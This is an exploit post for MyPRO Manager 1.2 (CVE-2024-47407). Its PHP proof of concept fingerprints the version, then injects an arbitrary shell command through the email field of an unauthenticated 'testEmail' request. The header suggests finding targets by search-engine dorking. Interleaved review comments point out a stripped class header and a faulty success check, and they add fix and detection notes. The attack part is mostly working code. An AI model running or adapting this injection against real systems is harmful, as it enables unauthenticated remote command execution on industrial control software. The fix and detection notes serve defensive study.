============================================================================================================================================= | # Title : MyPRO Manager 1.2 php code injection | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://www.myscada.org/mypro/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: MyPRO Manager versions 1.2 and below suffer from an unauthenticated command injection vulnerability. (Related : https://packetstorm.news/files/id/189175/ Related CVE numbers: CVE-2024-47407 ) . [+] save code as poc.php. [+] Set Target : line 79. [+] Usage : php poc.php [+] PayLoad : targetUri = $targetUri; }
    // NOTE(review): the opening `<?php`, the class header and the start of the
    // constructor are missing from this copy (everything up to `targetUri = $targetUri; }`
    // appears to have been stripped); only the constructor's tail survives above.

    // Fingerprints the target by fetching one bundled JS asset and reading the
    // `const v="..."` version constant out of it.
    // Returns "Appears vulnerable" (version <= 1.2), "Safe" (newer) or "Unknown"
    // (asset not found, constant not present, or any exception).
    // The asset name is build-specific, so a target serving a different bundle
    // never matches and falls through to "Unknown" rather than "Safe".
    public function check() {
        try {
            $url = $this->targetUri . '/assets/index-Aup6jYxO.js';
            $response = $this->sendRequest($url, 'GET');
            if (preg_match('/const v="([^"]+)"/', $response, $matches)) {
                $version = $matches[1];
                echo 'Version retrieved: ' . $version . "\n";
                // version_compare() handles dotted versions; "<=" treats 1.2 itself as affected.
                if (version_compare($version, '1.2', '<=')) {
                    return "Appears vulnerable";
                }
                return "Safe";
            }
        } catch (Exception $e) {
            // sendRequest() is built on curl_exec(), which reports transport failure by
            // returning false instead of throwing, so a dead target normally reaches the
            // preg_match() above with `false` (no match) rather than this branch.
            return "Unknown";
        }
        return "Unknown";
    }

    // Public entry point; delegates to executeCommand().
    public function exploit($cmd) {
        $this->executeCommand($cmd);
    }

    // Thin wrapper: sends the command and prints a completion line.
    // The "finished" message is printed unconditionally; it does not mean the
    // command ran (see the note in getHttpResponseCode()).
    private function executeCommand($cmd) {
        $this->execMyPROMgr($cmd);
        echo 'Exploit finished, check thy shell.' . "\n";
    }

    // Builds the JSON body for the application's `testEmail` command and POSTs it to /get.
    // The `email` value is a random-looking address followed by `&&`, the caller's
    // command and a trailing ` #`. This only has an effect if the server hands the
    // email field to a shell unescaped, which is the weakness the header attributes
    // to CVE-2024-47407; no authentication is sent with the request.
    // Defender notes: the server-side fix is to validate the address against an
    // anchored pattern, invoke the mailer with an argument list rather than a shell
    // string, and require authentication on /get. For detection, a POST to /get with
    // `command` = `testEmail` whose `email` field contains shell metacharacters
    // (`&&`, `#`) is a high-fidelity indicator of this PoC.
    private function execMyPROMgr($cmd) {
        $postData = [
            'command' => 'testEmail',
            'email' => $this->generateRandomString(3, 12) . '@' . $this->generateRandomString(4, 8) . '.com&&' . $cmd . ' #'
        ];
        $response = $this->sendRequest($this->targetUri . '/get', 'POST', json_encode($postData));
        // NOTE(review): this success test is unreliable; $response is the body only,
        // so getHttpResponseCode() is comparing an arbitrary body slice with 200.
        if ($response && $this->getHttpResponseCode($response) == 200) {
            echo 'Command successfully executed, check your shell.' . "\n";
        } else {
            echo 'Unexpected or no reply received.' . "\n";
        }
    }

    // Minimal cURL wrapper. Returns the response body as a string, or false when
    // curl_exec() fails (no timeout is set, and curl_error() is never consulted).
    // CURLOPT_HEADER is not set, so no status line or headers are included in the
    // return value. For POST the body is sent as-is with a JSON content type.
    private function sendRequest($url, $method, $data = null) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
        }
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    // Returns an alphanumeric string whose length is drawn from [$minLength, $maxLength].
    // Uses rand(), a non-cryptographic PRNG; that is fine here because the value is
    // only a throwaway address fragment, not a secret.
    private function generateRandomString($minLength, $maxLength) {
        $length = rand($minLength, $maxLength);
        return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);
    }

    // Slices three characters at offset 9 of $response, where an "HTTP/1.1 NNN"
    // status line would put the status code.
    // NOTE(review): sendRequest() never enables CURLOPT_HEADER, so $response is the
    // body alone and this offset does not hold a status code; use
    // curl_getinfo($ch, CURLINFO_RESPONSE_CODE) inside sendRequest() if a real
    // status is wanted. The original author's assumption is kept below.
    private function getHttpResponseCode($response) {
        return substr($response, 9, 3); // Assuming response contains status code as the first 3 digits after HTTP/1.1
    }
}

// Example usage
// The target URL below is the "Set Target : line 79" reference in the header;
// 'http://example.com' is a placeholder, not a real target.
$exploit = new MyPROManagerExploit('http://example.com');
$checkResult = $exploit->check();
echo $checkResult . "\n";
// check() returns one of three fixed strings; only the "Appears vulnerable" one proceeds.
if ($checkResult == "Appears vulnerable") {
    $exploit->exploit('id'); // Exploit with a sample command like 'id'
}
?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================